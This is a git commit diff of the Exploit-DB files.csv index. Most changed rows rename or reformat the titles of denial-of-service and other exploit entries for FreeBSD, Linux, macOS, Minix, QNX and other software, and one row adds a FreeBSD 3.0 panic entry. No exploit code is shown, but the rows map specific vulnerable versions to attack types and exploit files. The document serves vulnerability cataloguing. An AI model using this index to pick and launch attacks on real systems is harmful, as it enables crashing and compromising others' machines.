DB: 2017-10-05
9 new exploits FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service) FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC) SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC) Minix 3.1.2a - tty panic Local Denial of Service Minix 3.1.2a - tty panic Remote Denial of Service Minix 3.1.2a - Local TTY Panic (Denial of Service) Minix 3.1.2a - Remote TTY Panic (Denial of Service) Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic (Denial of Service) QNX 6.4.0 - bitflipped elf binary 'id' Kernel Panic Exploit QNX 6.4.0 - bitflipped ELF Binary 'id' Kernel Panic (Denial of Service) FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit FreeBSD 7.x - Dumping Environment Local Kernel Panic (Denial of Service) FreeBSD and OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic Denial of Service (2) Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2) Apple Mac OSX < 10.6.7 - Kernel Panic Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service) genstat 14.1.0.5943 - Multiple Vulnerabilities GenStat 14.1.0.5943 - Multiple Vulnerabilities FreeBSD 3.0 - UNIX-domain Panic (Denial of Service) Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service) Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service Apple Mac OSX 10.2.2 - Directory Kernel Panic (Denial of Service) OpenBSD 5.5 - Local Kernel Panic OpenBSD 5.5 - Local Kernel Panic (Denial of Service) OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service) FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) Microsoft Windows Kernel - win32k.sys .TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2) Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Privilege Escalation FreeBSD TOP - Format String FreeBSD /usr/bin/top - Format String Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation Qpopper 4.0.8 (FreeBSD) - Privilege Escalation Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation Sudo 1.6.9p18 - 'Defaults SetEnv' Privilege Escalation FreeBSD 8.0 Run-Time Link-Editor (rtld) - Privilege Escalation FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Privilege Escalation FreeBSD 3.0 - UNIX-domain panic FreeBSD 3.5/4.x - top Format String FreeBSD 3.5/4.x /usr/bin/top - Format String OpenBSD 5.6 - Multiple Local Kernel Panics Vm86 - Syscall Task Switch Kernel Panic / Privilege Escalation Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation DiskBoss Enterprise 8.4.16 - Local Buffer Overflow Microsoft Windows - RPC Locator Service Remote Exploit Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit Microsoft Windows - SMB Authentication Remote Exploit Microsoft Windows 2000/XP - SMB Authentication Remote Exploit Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit Webfroot Shoutbox < 2.32 (Apache) - Remote Exploit Winmail Mail Server 2.3 - Remote Format String Winmail Mail Server 2.3 Build 0402 - Remote Format String Linux eXtremail 1.5.x - Remote Format Strings Exploit eXtremail 1.5.x (Linux) - Remote Format Strings Exploit QBik WinGate WWW Proxy Server 6.1.1.1077 - (POST) Remote Buffer Overflow QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow Solaris 9 (UltraSPARC) - sadmind Remote Code Execution Solaris 9 (UltraSPARC) - 'sadmind' Remote Code Execution Sun One WebServer 6.1 - JSP Source Viewing Sun One WebServer 6.1 - .JSP Source Viewing Solaris 7.0 - Recursive mutex_enter Panic MySQL - Windows Remote System Level Exploit (Stuxnet technique) MySQL - 'Stuxnet Technique' Windows Remote System Exploit vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit) vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit) vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload (Metasploit) vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit) ERS Data System 1.8.1 - Java Deserialization Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Linux/x86_64 - Kill All Processes Shellcode (19 bytes) Linux/x86_64 - Fork Bomb Shellcode (11 bytes) Linux/x86-64 - Kill All Processes Shellcode (19 bytes) Linux/x86-64 - Fork Bomb Shellcode (11 bytes) Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes) Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) vtiger CRM 4.2 - (calpath) Multiple Remote File Inclusion vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusion Flatnuke 2.7.1 - (level) Privilege Escalation Flatnuke 2.7.1 - 'level' Privilege Escalation Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting Cilem Haber 1.4.4 (Tr) - Database Disclosure (Python) Cilem Haber 1.4.4 (Tr) - Database Disclosure Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion vtiger CRM 5.1.0 - Local File Inclusion vTiger CRM 5.1.0 - Local File Inclusion phpmychat plus 1.94 rc1 - Multiple Vulnerabilities template CMS 2.1.1 - Multiple Vulnerabilities phpmybittorrent 2.04 - Multiple Vulnerabilities phpMyChat Plus 1.94 RC1 - Multiple Vulnerabilities Template CMS 2.1.1 - Multiple Vulnerabilities phpMyBitTorrent 2.04 - Multiple Vulnerabilities vtiger CRM 4.2 Leads Module - record Parameter Cross-Site Scripting vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting vtiger CRM 4.2 - SQL Injection vTiger CRM 4.2 Leads Module - 'record' Parameter Cross-Site Scripting vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting vTiger CRM 4.2 - SQL Injection DreamLevels Dream Poll 3.0 - View_Results.php SQL Injection DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities Vtiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection vTiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection osCommerce 2.2 - admin/orders_status.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/products_attributes.php page Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/orders_status.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/products_attributes.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - admin/banner_manager.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/banner_statistics.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/countries.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/currencies.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/languages.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/manufacturers.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/products_expected.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/reviews.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/specials.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/stats_products_purchased.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/stats_products_viewed.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/tax_classes.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/tax_rates.php page Parameter Cross-Site Scripting osCommerce 2.2 - admin/zones.php page Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/banner_manager.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/banner_statistics.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/countries.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/currencies.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/languages.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/manufacturers.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/products_expected.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/reviews.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/specials.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/stats_products_purchased.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/stats_products_viewed.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/tax_classes.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/tax_rates.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/zones.php' 'page' Parameter Cross-Site Scripting Cilem Haber Free Edition - hata.asp hata Parameter Cross-Site Scripting Cilem Haber Free Edition - 'hata.asp' 'hata' Parameter Cross-Site Scripting GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting GForge 4.6/4.5/3.1 - 'Verify.php' Cross-Site Scripting Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/install_module.php level Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/uninstall_module.php level Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - upload/xax/admin/patch/index.php level Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php' 'level' Parameter Remote File Inclusion Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion vtiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities ITS SCADA 'Username' - SQL Injection ITS SCADA - 'Username' SQL Injection vtiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting vtiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection vTiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Parameter Cross-Site Scripting vTiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities Vtiger CRM 6.3.0 - Authenticated Remote Code Execution vTiger CRM 6.3.0 - Authenticated Remote Code Execution EPESI 1.8.2 rev20170830 - Cross-Site Scripting Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution ClipBucket 2.8.3 - Remote Code Execution
This commit is contained in:
Offensive Security
parent
4df0e06052
commit
d4e17b950d
13 changed files with 420 additions and 92 deletions
184
files.csv
184
files.csv
|
|
@ -288,7 +288,7 @@ id,file,description,date,author,platform,type,port
|
|||
1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0
|
||||
1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0
|
||||
1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0
|
||||
1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0
|
||||
1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)",2006-02-28,"Evgeny Legerov",bsd,dos,0
|
||||
1551,platforms/hardware/dos/1551.txt,"Multiple Routers - (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0
|
||||
1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0
|
||||
1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Crash (Denial of Service)",2006-03-06,"Luigi Auriemma",windows,dos,0
|
||||
|
|
@ -403,7 +403,7 @@ id,file,description,date,author,platform,type,port
|
|||
2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0
|
||||
2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - (RCPT TO) Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0
|
||||
2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - (ADODB Execute) Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0
|
||||
2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0
|
||||
2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0
|
||||
2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0
|
||||
2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0
|
||||
2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0
|
||||
|
|
@ -706,7 +706,7 @@ id,file,description,date,author,platform,type,port
|
|||
5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' 'SetUninstallName()' Heap Overflow (PoC)",2008-03-10,void,windows,dos,0
|
||||
5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0
|
||||
5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service",2008-03-11,ryujin,windows,dos,0
|
||||
5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0
|
||||
5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0
|
||||
5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0
|
||||
5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0
|
||||
5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,windows,dos,0
|
||||
|
|
@ -756,8 +756,8 @@ id,file,description,date,author,platform,type,port
|
|||
6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0
|
||||
6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0
|
||||
6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0
|
||||
6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0
|
||||
6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0
|
||||
6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - Local TTY Panic (Denial of Service)",2008-07-23,kokanin,minix,dos,0
|
||||
6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - Remote TTY Panic (Denial of Service)",2008-07-25,kokanin,minix,dos,0
|
||||
6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - Malformed Archive Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0
|
||||
6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0
|
||||
6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - Remote Reboot (Denial of Service)",2008-08-03,crit3rion,hardware,dos,0
|
||||
|
|
@ -849,7 +849,7 @@ id,file,description,date,author,platform,type,port
|
|||
7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,hardware,dos,0
|
||||
7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0
|
||||
7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
|
||||
7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0
|
||||
7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic (Denial of Service)",2008-11-11,"Andrea Bittau",linux,dos,0
|
||||
7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0
|
||||
7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0
|
||||
7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0
|
||||
|
|
@ -917,7 +917,7 @@ id,file,description,date,author,platform,type,port
|
|||
7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 - (ICEbrowser) Remote System Denial of Service",2009-01-16,"Jeremy Brown",windows,dos,0
|
||||
7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 - TwinVQ Stack Buffer Overflow (PoC)",2009-01-16,sCORPINo,multiple,dos,0
|
||||
7822,platforms/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service",2009-01-19,"Jon Oberheide",multiple,dos,0
|
||||
7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped elf binary 'id' Kernel Panic Exploit",2009-01-19,kokanin,qnx,dos,0
|
||||
7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped ELF Binary 'id' Kernel Panic (Denial of Service)",2009-01-19,kokanin,qnx,dos,0
|
||||
7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 - (licence key) Remote Buffer Overflow (PoC)",2009-01-22,LiquidWorm,windows,dos,0
|
||||
7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - '.m3u' Local Buffer Overflow (PoC)",2009-01-25,AlpHaNiX,windows,dos,0
|
||||
7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos,0
|
||||
|
|
@ -969,7 +969,7 @@ id,file,description,date,author,platform,type,port
|
|||
8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)",2009-03-18,zAx,windows,dos,0
|
||||
8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0
|
||||
8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0
|
||||
8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0
|
||||
8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - Dumping Environment Local Kernel Panic (Denial of Service)",2009-03-23,kokanin,freebsd,dos,0
|
||||
8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0
|
||||
8262,platforms/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0
|
||||
8263,platforms/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0
|
||||
|
|
@ -1425,7 +1425,7 @@ id,file,description,date,author,platform,type,port
|
|||
11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0
|
||||
11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,windows,dos,0
|
||||
11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0
|
||||
11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0
|
||||
11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0
|
||||
11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0
|
||||
11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0
|
||||
11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0
|
||||
|
|
@ -1919,7 +1919,7 @@ id,file,description,date,author,platform,type,port
|
|||
16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 Slideshow - '.jpg' Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos,0
|
||||
16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor - '.avi' Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos,0
|
||||
16945,platforms/hardware/dos/16945.pl,"Nokia N97 - '.m3u' Playlist Crash (PoC)",2011-03-08,KedAns-Dz,hardware,dos,0
|
||||
16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic Denial of Service (2)",2011-03-10,zx2c4,linux,dos,0
|
||||
16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)",2011-03-10,zx2c4,linux,dos,0
|
||||
16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0
|
||||
16966,platforms/linux/dos/16966.php,"PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service",2011-03-12,"Jose Carlos Norte",linux,dos,0
|
||||
16973,platforms/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0
|
||||
|
|
@ -2040,14 +2040,14 @@ id,file,description,date,author,platform,type,port
|
|||
17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0
|
||||
17890,platforms/windows/dos/17890.c,"GMER 1.0.15.15641 - MFT Overwrite",2011-09-26,Heurs,windows,dos,0
|
||||
17896,platforms/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
|
||||
17901,platforms/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic",2011-09-28,hkpco,osx,dos,0
|
||||
17901,platforms/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service)",2011-09-28,hkpco,osx,dos,0
|
||||
17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0
|
||||
17908,platforms/freebsd/dos/17908.sh,"FreeBSD - UIPC socket heap Overflow (PoC)",2011-09-30,"Shaun Colley",freebsd,dos,0
|
||||
17918,platforms/windows/dos/17918.txt,"Adobe Photoshop Elements 8.0 - Multiple Arbitrary Code Execution Vulnerabilities",2011-10-02,LiquidWorm,windows,dos,0
|
||||
17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - '.ashprj' Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0
|
||||
17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0
|
||||
17930,platforms/windows/dos/17930.txt,"Cytel Studio 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0
|
||||
17931,platforms/windows/dos/17931.txt,"genstat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0
|
||||
17931,platforms/windows/dos/17931.txt,"GenStat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0
|
||||
17933,platforms/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow (PoC)",2011-10-05,Snake,windows,dos,0
|
||||
17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0
|
||||
17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos,0
|
||||
|
|
@ -2237,6 +2237,7 @@ id,file,description,date,author,platform,type,port
|
|||
19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0
|
||||
19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
|
||||
19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0
|
||||
19130,platforms/freebsd/dos/19130.c,"FreeBSD 3.0 - UNIX-domain Panic (Denial of Service)",1999-05-05,"Lukasz Luzar",freebsd,dos,0
|
||||
19137,platforms/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off (Denial of Service) (Metasploit)",2012-06-14,it.solunium,hardware,dos,0
|
||||
